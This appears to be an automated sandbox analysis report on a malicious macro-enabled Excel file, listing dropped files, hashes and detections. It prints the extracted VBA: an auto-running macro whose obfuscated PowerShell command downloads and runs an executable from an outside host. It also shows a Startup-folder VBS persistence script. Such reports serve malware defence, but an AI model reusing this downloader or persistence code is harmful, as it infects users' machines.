                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6916
                                                                                          Entropy (8bit):4.765218321768022
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV
                                                                                          MD5:665354A1A9139D1FA96E6FCC7F1FCE73
                                                                                          SHA1:8477F42550FBBA457D4015AAAC889272C7FAF1D8
                                                                                          SHA-256:146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01
                                                                                          SHA-512:F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........&.w.....w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1^.......Test-Path........Limit-EventLog........Show-ControlPanelItem........Get-Content........Rename-

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CD0796D.png

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 1209 x 635, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):434291
                                                                                          Entropy (8bit):7.997330288407972
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:Kl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv253:K5PBexJJF2cSwG4ofTn53
                                                                                          MD5:DAE027B27EC83FBAEC24D5DFB4847433
                                                                                          SHA1:33BFCDF151B8CBD522256CC5B813549FE5EEB1D1
                                                                                          SHA-256:6C3FF9BA646AF527087B7CA1A9E93C2F06C7C0A4CC1A373C8DA4F0A868C7C319
                                                                                          SHA-512:380F4CD5671F96AFCFAD25E0E2198D7BEFC66A9A5E8715004DA35EB7220CF2FB190EDCB90B7E63F1A734B4862E063B17844D77456930302284953FF153647202
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:.PNG........IHDR.......{.............sRGB.........pHYs..........+......IDATx^......u'.O.;.sB.. @...sR %Q.d.+Z.d.,.}.....;..|..'.>..IQ...@. ..s....s.....W...{v{V....bBwU.PU.[..+.`8P..".M$..5Z...._....C..J|>.8.Q.9..S=...eEYKHGN...+.^v.7[.e7<v.\b.}L.r4j.-y.<...)HuN.......L....9.^.*.S-.....r...{...+....8....s.M.GsoI~..Gi....P9.r@.....9.g.3.......O.x...;M.....JW...........?..F..N..hB..h1...U....K..Z.....Yh.V+.....1......%...{..P..%R.hS.*.C......G.Z....({.h..C')Y..tG.!.8....D,="....&J..g~..~.7s..x...lK&h.`E2.Q~..E.p...iUz...,(/=..g..(.#...m.(_..L.....qg).....S3#%.i...5$]i.....f..R.(.s..........C....^4.5.Zdeq....t.DCZ....~.(1{.$...S...R.b ....0*.V>.LN...P..G......c..<.....O..2.A:.....*fSx.\..I.."q..T.l..8...q..?U.d.?<..dW1...A.T1;..... ...M...'W...2'..@j4f..r'!.".E....,.....8ijN.8."...~.U.....N.3..:.....+.....W&...p.h..u.}8...6...-.-....&.7...m$.......s..[:......-...(V.....r..Q.N.{..#.....o....J.........H..A..9V...P3U?.,..I.?.C.o,h......-..@v!.

                                                                                          C:\Users\user\AppData\Local\Temp\gwjpox30.b33.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Local\Temp\lvmpns14.xqn.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Local\Temp\tmp7752.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1072096
                                                                                          Entropy (8bit):7.751716236673022
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:AY2YACYOYGYAAYAtY0YHYAkYAtYJYAAYoYA2YnYAqYDYAHONafeTZce9rlmxTfgX:UfeTZcYhmCBqKzSdG
                                                                                          MD5:2ED7362E959D42385D4E6D231A6840DD
                                                                                          SHA1:B3CC47AC92296D978FC991D9658C771F225DBF18
                                                                                          SHA-256:13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30
                                                                                          SHA-512:66553BB74D63E2D8BB47751F87F93DEE66C4ACBE647115DEA5148D6B301F0A6802AE972A3FC26C1BCF9412775F1FBFD6238C1B477F726E0386CDEF183551B758
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: DGTCkacbSz.xlsx, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g.....................J........... ... ....@.. ....................................`.................................\...O.... ..nF...........>............................................................... ............... ..H............text........ ...................... ..`.rsrc...nF... ...H..................@..@.reloc...............<..............@..B........................H........q.............................................................?.C.:....g|........>~.g?..!.....t}....]...W........>6#S....>.....`T?.(.>_'.>.......&!?.V!......>&..^..f.....O.n?T.>b,.>.......xcm?>.........7.._...h".......{..7?..&.......w..9..8f........f?.Q.>........+.d?Y.............<.'....?......r?a.G..`}>....*..>..N.G......r6a?.?.>.Y.>....z..?AH2?...>....-'....|..Yk.....g....8..7.O?.........:u>..A.....,J.>..I...n.....q.Z...a..l......PY?6..>+l.....H...../.

                                                                                          C:\Users\user\AppData\Local\Temp\~DF3CAD9F37754A2A51.TMP

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                          Malicious:false
                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\tmp7752.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):81
                                                                                          Entropy (8bit):4.756456874631155
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:FER/n0eFHHoXp4EaKC51Hn:FER/lFHIPaZ5t
                                                                                          MD5:DFEF3C321A0EBAB536D6E3215B1DFC8B
                                                                                          SHA1:97E8201D0952F8980C30E7BB26A6AADFED16DD8F
                                                                                          SHA-256:5143DF7EB4C435AE42D52AA0B2A295F79285D28240DFEED796CB12D68BA4A347
                                                                                          SHA-512:006A719162E465A00FB08E1F2CE19667B9A53CA91585A39CAC675EECF4037ADEB44C3285CDA7610A292C591AA1BFF7EE4F6790BB8F769BDC64F9C27F2A0D61F1
                                                                                          Malicious:true
                                                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\svcost.exe"""

                                                                                          C:\Users\user\AppData\Roaming\svcost.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\tmp7752.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):293066043
                                                                                          Entropy (8bit):7.999992280333326
                                                                                          Encrypted:true
                                                                                          SSDEEP:6291456:WiHxwPRNbYWvmzsoa3n9YMTDoBihjWh3ZGgCRXkAc+qv:W6URaiv39HTDqdprIkmqv
                                                                                          MD5:A210D6F3E1093395552CE55FA063E011
                                                                                          SHA1:0349F7AE3949931FB733CE38EA521C47B0349124
                                                                                          SHA-256:12CE74D8E1F68C394FC86A2882A3F15936FF0DB55EB1A2E807620524CF59A734
                                                                                          SHA-512:B451D3E9CA0CFB32871AA8A1EFE13CE9B8416363A1583EA719F931C73C341950644D5D3C6A60DE964498CCE467555F6957FCC11C4284B02041E3654BCC8FECFD
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g.....................J........... ... ....@.. ....................................`.................................\...O.... ..nF...........>............................................................... ............... ..H............text........ ...................... ..`.rsrc...nF... ...H..................@..@.reloc...............<..............@..B........................H........q.............................................................?.C.:....g|........>~.g?..!.....t}....]...W........>6#S....>.....`T?.(.>_'.>.......&!?.V!......>&..^..f.....O.n?T.>b,.>.......xcm?>.........7.._...h".......{..7?..&.......w..9..8f........f?.Q.>........+.d?Y.............<.'....?......r?a.G..`}>....*..>..N.G......r6a?.?.>.Y.>....z..?AH2?...>....-'....|..Yk.....g....8..7.O?.........:u>..A.....,J.>..I...n.....q.Z...a..l......PY?6..>+l.....H...../.

                                                                                          C:\Users\user\Desktop\7qsPAygCOx.xls (copy)

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:Microsoft Excel 2007+
                                                                                          Category:dropped
                                                                                          Size (bytes):449245
                                                                                          Entropy (8bit):7.993954682752184
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:wel3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25C:T5PBexJJF2cSwG4ofTn5C
                                                                                          MD5:2C317EE5FA188456BDBA04BEC0CA2B1A
                                                                                          SHA1:D4C074EB1B51BA2917C667473F925F7A953E6A21
                                                                                          SHA-256:BC011C9E45964F2C0D3F50F65F57DE24C1A3B0BF301E6BB17C9DBF5EE461D832
                                                                                          SHA-512:8689AE337C61B51C4FE59A1F8AB57E927BF4A73C3EEF1ACECE08F4DA0EC7CE1D99267B7EC321B04AF8F5769E4F31B80F0AAB7499023096F01D2DD319AE2CEC5A
                                                                                          Malicious:false
                                                                                          Preview:PK..........!.-..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.........5.&.)..3I.......c.7o.....U..dch.......i#.....QQ.`...X!......i..*F.j..t....z ...>....g...z.STg....1....-...op...T.K.^G..TT...Z.FX...}..1.a..)9...5..Fz..db5....s|A]v.ett...7(..)..&:.,.PhO....n.{..dk.z.\..s.........r?I.......b..t.....9.`.G.{.:$..u....Sn.~.\sI)#...;.:....(.X....C.h..RY9..v.&=.l2...............@$....{......D.......\.......h*l/..f......;.......PK..........!..U0#....L......._re

                                                                                          C:\Users\user\Desktop\BA230000

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:Microsoft Excel 2007+
                                                                                          Category:dropped
                                                                                          Size (bytes):449245
                                                                                          Entropy (8bit):7.993954682752184
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:wel3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25C:T5PBexJJF2cSwG4ofTn5C
                                                                                          MD5:2C317EE5FA188456BDBA04BEC0CA2B1A
                                                                                          SHA1:D4C074EB1B51BA2917C667473F925F7A953E6A21
                                                                                          SHA-256:BC011C9E45964F2C0D3F50F65F57DE24C1A3B0BF301E6BB17C9DBF5EE461D832
                                                                                          SHA-512:8689AE337C61B51C4FE59A1F8AB57E927BF4A73C3EEF1ACECE08F4DA0EC7CE1D99267B7EC321B04AF8F5769E4F31B80F0AAB7499023096F01D2DD319AE2CEC5A
                                                                                          Malicious:false
                                                                                          Preview:PK..........!.-..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#....(v..j.........5.&.)..3I.......c.7o.....U..dch.......i#.....QQ.`...X!......i..*F.j..t....z ...>....g...z.STg....1....-...op...T.K.^G..TT...Z.FX...}..1.a..)9...5..Fz..db5....s|A]v.ett...7(..)..&:.,.PhO....n.{..dk.z.\..s.........r?I.......b..t.....9.`.G.{.:$..u....Sn.~.\sI)#...;.:....(.X....C.h..RY9..v.&=.l2...............@$....{......D.......\.......h*l/..f......;.......PK..........!..U0#....L......._re

                                                                                          C:\Users\user\Desktop\BA230000:Zone.Identifier

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:false
                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                          C:\Users\user\Desktop\~$7qsPAygCOx.xls

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):165
                                                                                          Entropy (8bit):1.4377382811115937
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                          Malicious:false
                                                                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                          C:\Users\user\Desktop\~$7qsPAygCOx.xlsx

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):165
                                                                                          Entropy (8bit):1.4377382811115937
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                          Malicious:true
                                                                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:Microsoft Excel 2007+
                                                                                          Entropy (8bit):7.994011749688452
                                                                                          TrID:
                                                                                          • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                                                                                          • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                                                                                          • ZIP compressed archive (8000/1) 8.38%
                                                                                          File name:7qsPAygCOx.xlsx
                                                                                          File size:449'271 bytes
                                                                                          MD5:9bf51f7bdf35911324a4fbb9235090f7
                                                                                          SHA1:d1abcb2b543a4c0f308dade69d1be6a96f356a3b
                                                                                          SHA256:b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025
                                                                                          SHA512:c678628535508e250605babc13d899c598ab1466294b7917d583b577fb5362346b47952d684622c445512753980329ecc513934a7391b7511f7fc1588d981aff
                                                                                          SSDEEP:12288:Zl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25F3:Z5PBexJJF2cSwG4ofTn55
                                                                                          TLSH:6BA42302D3293ECFF813537B5DD09B8480E03CD2594B241E3A1AA879659B4FFA55BB5C
                                                                                          File Content Preview:PK..........!.-...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                          File Icon

                                                                                          Icon Hash:2562ab89a7b7bfbf

                                                                                          Static OLE Info

                                                                                          General

                                                                                          Document Type:OpenXML
                                                                                          Number of OLE Files:1

                                                                                          OLE File "7qsPAygCOx.xlsx"

                                                                                          Indicators
                                                                                          Has Summary Info:
                                                                                          Application Name:
                                                                                          Encrypted Document:False
                                                                                          Contains Word Document Stream:False
                                                                                          Contains Workbook/Book Stream:True
                                                                                          Contains PowerPoint Document Stream:False
                                                                                          Contains Visio Document Stream:False
                                                                                          Contains ObjectPool Stream:False
                                                                                          Flash Objects Count:0
                                                                                          Contains VBA Macros:True
                                                                                          Summary
                                                                                          Author:Dell
                                                                                          Last Saved By:george
                                                                                          Create Time:2021-08-19T14:03:52Z
                                                                                          Last Saved Time:2024-11-21T13:33:54Z
                                                                                          Creating Application:Microsoft Excel
                                                                                          Security:0
                                                                                          Document Summary
                                                                                          Thumbnail Scaling Desired:false
                                                                                          Company:
                                                                                          Contains Dirty Links:false
                                                                                          Shared Document:false
                                                                                          Changed Hyperlinks:false
                                                                                          Application Version:16.0300

                                                                                          Streams with VBA

                                                                                          VBA File Name: Sheet1.cls, Stream Size: 1181
                                                                                          General
                                                                                          Stream Path:VBA/Sheet1
                                                                                          VBA File Name:Sheet1.cls
                                                                                          Stream Size:1181
                                                                                          Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . p . . . 3 q 1 * l H B . ` a . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . b k . $ O G = Q . . . . . . . . . . . . . . . . . . . . . . x . . . . b k . $ O G = Q 3 q 1 * l H B . ` a . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 . 0 . 0 . 0 . - . 0
                                                                                          Data Raw:01 16 03 00 06 00 01 00 00 5a 03 00 00 e4 00 00 00 10 02 00 00 88 03 00 00 96 03 00 00 ea 03 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 00 00 ff ff 21 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 f1 d6 33 71 31 2a 6c 48 a1 42 c8 16 c6 60 61 e7 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                          VBA Code
                                                                                          Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                          VBA File Name: ThisWorkbook.cls, Stream Size: 2859
                                                                                          General
                                                                                          Stream Path:VBA/ThisWorkbook
                                                                                          VBA File Name:ThisWorkbook.cls
                                                                                          Stream Size:2859
                                                                                          Data ASCII:. . . . . . . . . " . . . . . . 8 . . . t . . . . . . Z . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . p . . . $ > J K Y . & . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ] n @ j J . : . . . . . . . . . . . . . . . . . . . . . . x . . . . ] n @ j J . : $ > J K Y . & . . . . M E . . . . . . . . . . . . . . . . . . . . . 0 . P . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . . . . . . . . < 8 . . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2
                                                                                          Data Raw:01 16 03 00 06 00 01 00 00 22 05 00 00 e4 00 00 00 38 02 00 00 74 05 00 00 82 05 00 00 5a 08 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 00 00 ff ff 21 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 24 be d1 c4 e8 9c 3e 4a b2 83 4b 59 19 a7 95 26 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                          VBA Code
                                                                                          Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim Lxhraxtl As String, sOutput As String
Dim Hthql As Object, HthqlExec As Object
Lxhraxtl = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
Lxhraxtl = Replace(Lxhraxtl, "*", "")
Lxhraxtl = Replace(Lxhraxtl, "^", "")
Set Hthql = CreateObject("WScript.Shell")
Set HthqlExec = Hthql.Exec(Lxhraxtl)
End Sub

                                                                                          Streams

                                                                                          Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 476
                                                                                          General
                                                                                          Stream Path:PROJECT
                                                                                          CLSID:
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Stream Size:476
                                                                                          Entropy:5.123519453381166
                                                                                          Base64 Encoded:True
                                                                                          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 C 5 E F 0 5 6 1 0 B 6 1 4 B 6 1 4 B 3 1 9 B 3 1 9 " . . D P B = " B 8 B A 1 4 7 B 3 1 7 B 3 1 8 4 C F 7 C 3 1 1 C 6 C 9 B E 6 2 6 0 1 5 6 C C A
                                                                                          Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                                                                                          Stream Path: PROJECTwm, File Type: data, Stream Size: 62
                                                                                          General
                                                                                          Stream Path:PROJECTwm
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:62
                                                                                          Entropy:3.0554671543224337
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                                                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                                                          Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 1906
                                                                                          General
                                                                                          Stream Path:VBA/_VBA_PROJECT
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:1906
                                                                                          Entropy:3.94946435014848
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
